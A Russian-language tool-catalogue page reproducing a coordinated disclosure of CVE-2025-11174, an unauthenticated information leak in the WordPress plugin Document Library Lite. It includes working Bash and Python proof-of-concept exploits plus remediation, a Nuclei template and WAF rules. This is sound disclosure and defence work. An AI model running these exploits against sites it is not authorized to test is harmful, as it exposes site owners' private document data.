Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174 | Kitploit
Инструменты/GitHubGitHub/snailsploit/cve-2025-11174
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174

Репозиторий
24 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-11174: Неавторизованное раскрытие информации в плагине Document Library Lite для WordPress

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Ключевые слова: CVE-2025-11174, уязвимость Document Library Lite, раскрытие информации, безопасность WordPress, неавторизованный AJAX эксплойт, уязвимость плагина WordPress, CWE-862, безопасность плагина документов WordPress, обход авторизации, CVE WordPress 2025

Содержание

Обзор
  • Детали уязвимости
  • Технический анализ
  • Вектор атаки
  • Доказательство концепции
  • Руководство по устранению
  • Обнаружение
  • CVSS метрики
  • Ссылки
  • Благодарности
  • Контакт для безопасности
  • Обзор

    Уязвимость раскрытия информации в плагине Document Library Lite для WordPress (CVE-2025-11174) — ошибка безопасности, позволяющая неавторизованным пользователям получать доступ к конфиденциальным данным документов в плагине библиотеки документов WordPress.

    Была обнаружена критическая уязвимость обхода авторизации в плагине Document Library Lite для WordPress, которая позволяет неавторизованным злоумышленникам получать доступ к конфиденциальной информации о документах без надлежащей аутентификации.

    Обнаружено: Kai Aizen и Avraham Shemesh (SnailSploit)
    Опубликовано: 1 ноября 2025 г.
    Оценка CVSS: 5.3 (Средняя)
    CWE: CWE-862 — Отсутствие авторизации
    Плагин: Document Library Lite
    Вендор: Barn2 Plugins
    Тип атаки: Неавторизованное раскрытие информации
    Требуемые привилегии: Нет (Неавторизованная атака)

    Детали уязвимости

    Описание

    Плагин Document Library Lite для WordPress содержит уязвимость неправильной авторизации во всех версиях до 1.1.6 включительно. Плагин предоставляет неавторизованное AJAX-действие dll_load_posts, которое возвращает JSON-таблицу данных документов без проверки nonce или прав.

    Воздействие

    Эта уязвимость позволяет неавторизованным злоумышленникам:

    • Получать доступ к метаданным документов без авторизации
    • Извлекать списки документов, которые должны быть ограничены
    • Просматривать информацию о документах, предназначенную только для аутентифицированных пользователей
    • Перечислять документы, хранящиеся в библиотеке документов

    Примечание: Оценка CVSS 5.3 (средняя степень серьезности) отражает ограниченное раскрытие информации. Хотя уязвимость позволяет неавторизованным пользователям получать доступ к данным документов, воздействие на конфиденциальность оценено как Низкое, без воздействия на целостность или доступность.

    Затронутые версии

    • Уязвимые: Все версии ≤ 1.1.6
    • Исправленные: Версия 1.1.7 и выше

    CVSS v3.1 Метрики

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    
    МетрикаЗначение
    Вектор атакиСеть (AV:N)
    Сложность атакиНизкая (AC:L)
    Требуемые привилегииНет (PR:N)
    Взаимодействие с пользователемНет (UI:N)
    Область действияНе изменена (S:U)
    КонфиденциальностьНизкая (C:L)
    ЦелостностьНет (I:N)
    ДоступностьНет (A:N)

    Расшифровка CVSS v3.1:

    • Вектор атаки (AV): Сеть — уязвимость может быть использована удалённо через сеть
    • Сложность атаки (AC): Низкая — для эксплуатации не требуется особых условий
    • Требуемые привилегии (PR): Нет — для атаки не требуется аутентификация или привилегии
    • Взаимодействие с пользователем (UI): Нет — эксплойт работает без какого-либо взаимодействия с пользователем
    • Область действия (S): Не изменена — уязвимость затрагивает только уязвимый компонент
    • Влияние на конфиденциальность (C): Низкое — ограниченное раскрытие информации
    • Влияние на целостность (I): Нет — воздействия на целостность нет
    • Влияние на доступность (A): Нет — воздействия на доступность нет

    Технические детали

    Коренная причина уязвимости

    AJAX-действие dll_load_posts зарегистрировано без надлежащих проверок аутентификации или авторизации:

    root@kitploit:~
    // Уязвимый шаблон кода (упрощённо)
    add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
    

    Префикс wp_ajax_nopriv_ указывает, что это действие доступно неаутентифицированным пользователям, а функция обратного вызова не реализует:

    • Проверку nonce
    • Проверку прав
    • Проверку аутентификации пользователя

    Вектор атаки

    root@kitploit:~
    POST /wp-admin/admin-ajax.php
    action=dll_load_posts
    

    Уязвимость может быть использована через конечную точку WordPress admin-ajax.php без аутентификации.

    Доказательство концепции

    ⚠️ Только для образовательных целей и авторизованного тестирования

    Bash PoC

    root@kitploit:~
    #!/bin/bash
    # CVE-2025-11174 PoC
    
    TARGET_URL="$1"
    
    if [ -z "$TARGET_URL" ]; then
        echo "Usage: $0 <target_url>"
        echo "Example: $0 https://example.com"
        exit 1
    fi
    
    echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
    echo "[*] Target: $TARGET_URL"
    echo ""
    
    # Send request to vulnerable AJAX endpoint
    curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "action=dll_load_posts" \
      | python3 -m json.tool
    
    echo ""
    echo "[+] If you see document data above, the site is vulnerable!"
    

    Python PoC

    root@kitploit:~
    #!/usr/bin/env python3
    """
    CVE-2025-11174 - Document Library Lite Information Disclosure PoC
    For educational and authorized testing purposes only
    """
    
    import requests
    import sys
    import json
    
    def exploit(target_url):
        ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
        
        print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
        print(f"[*] Target: {target_url}")
        print(f"[*] AJAX Endpoint: {ajax_url}\n")
        
        data = {'action': 'dll_load_posts'}
        
        try:
            response = requests.post(ajax_url, data=data, timeout=10)
            
            if response.status_code == 200:
                print("[+] Request successful!\n")
                try:
                    json_data = response.json()
                    print("[+] Retrieved document data:")
                    print(json.dumps(json_data, indent=2))
                    print("\n[!] Site is VULNERABLE to CVE-2025-11174")
                except json.JSONDecodeError:
                    print("[-] No JSON response received")
                    print(f"Response: {response.text[:200]}")
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} <target_url>")
            print(f"Example: {sys.argv[0]} https://example.com")
            sys.exit(1)
        
        target = sys.argv[1]
        exploit(target)
    

    Устранение

    Для администраторов сайтов

    Немедленные действия:

    1. Обновите плагин Document Library Lite до версии 1.1.7 или выше немедленно
    2. Просмотрите журналы доступа вашего сайта на предмет подозрительных POST-запросов к admin-ajax.php с action=dll_load_posts
    3. Если вы не можете обновиться немедленно, рассмотрите возможность временного отключения плагина

    Инструкции по обновлению

    Через админ-панель WordPress:

    1. Перейдите в Плагины > Установленные плагины в админке WordPress
    2. Найдите «Document Library Lite»
    3. Нажмите Обновить сейчас, чтобы перейти на версию 1.1.7 или выше
    4. Убедитесь, что обновление прошло успешно

    Используя WP-CLI:

    root@kitploit:~
    wp plugin update document-library-lite
    

    Для разработчиков плагинов

    Убедитесь, что все обработчики AJAX реализуют надлежащие средства контроля безопасности:

    root@kitploit:~
    // Пример правильной безопасности AJAX
    add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
    
    function dll_load_posts_callback() {
        // Проверка nonce
        if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
            wp_die('Invalid nonce');
        }
        
        // Проверка прав
        if (!current_user_can('read')) {
            wp_send_json_error('Insufficient permissions');
            wp_die();
        }
        
        // Ваш безопасный код здесь
    }
    

    Обнаружение

    Проверка плагина WordPress

    root@kitploit:~
    # Проверка, установлена ли уязвимая версия
    wp plugin list | grep -i "document-library-lite"
    

    Правила сканера безопасности

    Шаблон Nuclei:

    root@kitploit:~
    id: CVE-2025-11174
    
    info:
      name: Document Library Lite - Unauthenticated Information Disclosure
      author: security-research
      severity: medium
      description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
      reference:
        - https://github.com/[your-repo]/CVE-2025-11174
      tags: cve,cve2025,wordpress,wp-plugin,unauth
    
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/wp-admin/admin-ajax.php"
        
        body: "action=dll_load_posts"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "data"
              - "recordsTotal"
            condition: and
          
          - type: status
            status:
              - 200
    

    Правила брандмауэра веб-приложений

    Правило ModSecurity:

    root@kitploit:~
    SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
        "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
        log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
        SecRule ARGS:action "@streq dll_load_posts" "t:none"
    

    Правило Nginx/OpenResty:

    root@kitploit:~
    if ($request_uri ~* "admin-ajax\.php") {
        if ($args ~* "action=dll_load_posts") {
            return 403;
        }
    }
    

    Хронология

    • 1 ноября 2025 г. — Уязвимость публично раскрыта
    • 1 ноября 2025 г. — Опубликована запись CVE
    • Ноябрь 2025 г. — Выпущен патч (версия 1.1.7)

    Ссылки

    • CVE-2025-11174 — CVE.org
    • GitHub Advisory Database
    • Wordfence Intelligence
    • Каталог плагинов WordPress

    Благодарности

    Исследователи:

    • Avraham Shemesh
    • Kai Aizen — SnailSploit

    Процесс раскрытия: Скоординированное раскрытие

    Отказ от ответственности

    Эта информация предоставлена исключительно для целей исследования безопасности и защиты. Любое использование этой уязвимости в злонамеренных целях незаконно и неэтично. Всегда получайте соответствующее разрешение перед тестированием систем, которые вам не принадлежат.

    Контакты

    По вопросам или для получения дополнительной информации об этой уязвимости:

    • Эл. почта: [email protected]
    • Веб-сайт: snailsploit.com
    • Организация: SnailSploit Security Research

    Последнее обновление: 2 ноября 2025 г.


    📚 Документация и автор

    Полный writeup этого проекта, методология и связанные исследования находятся на:

    https://snailsploit.com/security-research/cves/cve-2025-11174/

    Создано Kai Aizen — независимый исследователь безопасности в области наступательных атак.

    snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

    Та же атака. Другой субстрат.

    Скачать инструмент